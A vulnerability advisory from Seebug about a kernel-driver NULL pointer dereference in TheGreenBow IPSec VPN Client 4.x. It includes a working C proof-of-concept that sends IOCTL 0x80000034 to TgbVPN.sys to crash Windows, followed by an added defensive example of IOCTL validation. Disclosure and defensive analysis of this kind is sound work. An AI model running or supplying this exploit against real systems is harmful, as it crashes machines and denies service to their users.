TheGreenBow IPSec VPN Client TgbVPN.sys Denial of Service Vulnerability

2009-08-24T00:00:00
ID SSV:12095
Type seebug
Reporter Root
Modified 2009-08-24T00:00:00

Description

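TheGreenBow IPSec VPN Client is a popular VPN client. The TgbVPN.sys kernel driver of the TheGreenBow IPSec VPN client has a NULL pointer dereference error when handling IOCTLs. A local attacker can exploit the vulnerability by sending IOCTL 0x80000034 to crash the system.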

TheGreenBow IPSec VPN Client 4.x. No detailed solution is currently available: http://www.thegreenbow.com/vpn.html

/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 * http://evilcodecave.blogspot.com
 * http://evilcodecave.wordpress.com
 * http://evilfingers.com
 * http://malwareAnalytics.com [under construction]
 */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
int main(void)
{
   HANDLE hDevice;
   DWORD Junk;
   system("cls");
   printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");
   hDevice = CreateFileA("\\\\.\\tgbvpn",
                       0,
                       FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);
   if (hDevice == INVALID_HANDLE_VALUE)
   {
       printf("\n Unable to open device driver\n");
       return EXIT_FAILURE;
   }
   DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Junk, (LPOVERLAPPED)NULL);
   return EXIT_SUCCESS;
}
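
The transfer-method bits of 0x80000034 decode to METHOD_BUFFERED, and the request above passes zero for both buffer lengths; in that case the Windows I/O manager hands the driver a NULL system buffer regardless of the pointer values the caller supplied. The following added example (not code from the original page or from the vendor's driver) is a portable user-mode model of the validation an IOCTL handler needs before touching that buffer. It assumes the crash comes from an unchecked dereference of the system buffer, which the page does not show; `EXPECTED_IN_LEN` and all function names are hypothetical.

```c
/* Added example: user-mode model of IOCTL decoding and request validation.
 * EXPECTED_IN_LEN and every function name are hypothetical, not taken
 * from tgbvpn.sys. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define METHOD_BUFFERED 0u
#define EXPECTED_IN_LEN 16u /* hypothetical size of the request structure */

enum check_result { REQ_OK = 0, REQ_BAD_METHOD, REQ_NULL_BUFFER, REQ_TOO_SHORT };

struct ioctl_fields { uint32_t device_type, access, function, method; };

/* Split a Windows I/O control code into its CTL_CODE fields. */
struct ioctl_fields decode_ioctl(uint32_t code)
{
    struct ioctl_fields f;
    f.device_type = (code >> 16) & 0xFFFFu;
    f.access      = (code >> 14) & 0x3u;
    f.function    = (code >> 2)  & 0xFFFu;
    f.method      = code & 0x3u;
    return f;
}

/* Model of what a METHOD_BUFFERED handler receives: NULL when both
 * lengths are zero, otherwise a kernel copy of the caller's data. */
const void *system_buffer_for(const void *kernel_copy, uint32_t in_len, uint32_t out_len)
{
    return (in_len == 0 && out_len == 0) ? NULL : kernel_copy;
}

/* Checks a handler should pass before dereferencing the buffer. */
enum check_result validate_request(uint32_t code, const void *sysbuf, uint32_t in_len)
{
    if (decode_ioctl(code).method != METHOD_BUFFERED) return REQ_BAD_METHOD;
    if (sysbuf == NULL)                               return REQ_NULL_BUFFER;
    if (in_len < EXPECTED_IN_LEN)                     return REQ_TOO_SHORT;
    return REQ_OK;
}

int main(void)
{
    unsigned char copy[EXPECTED_IN_LEN] = {0}; /* constructed sample input */
    struct ioctl_fields f = decode_ioctl(0x80000034u);
    printf("device=0x%X access=%u function=0x%X method=%u\n", (unsigned)f.device_type,
           (unsigned)f.access, (unsigned)f.function, (unsigned)f.method);
    printf("zero-length request -> %d\n",
           validate_request(0x80000034u, system_buffer_for(copy, 0, 0), 0));
    printf("well-formed request -> %d\n",
           validate_request(0x80000034u, system_buffer_for(copy, 16, 0), 16));
    return 0;
}
```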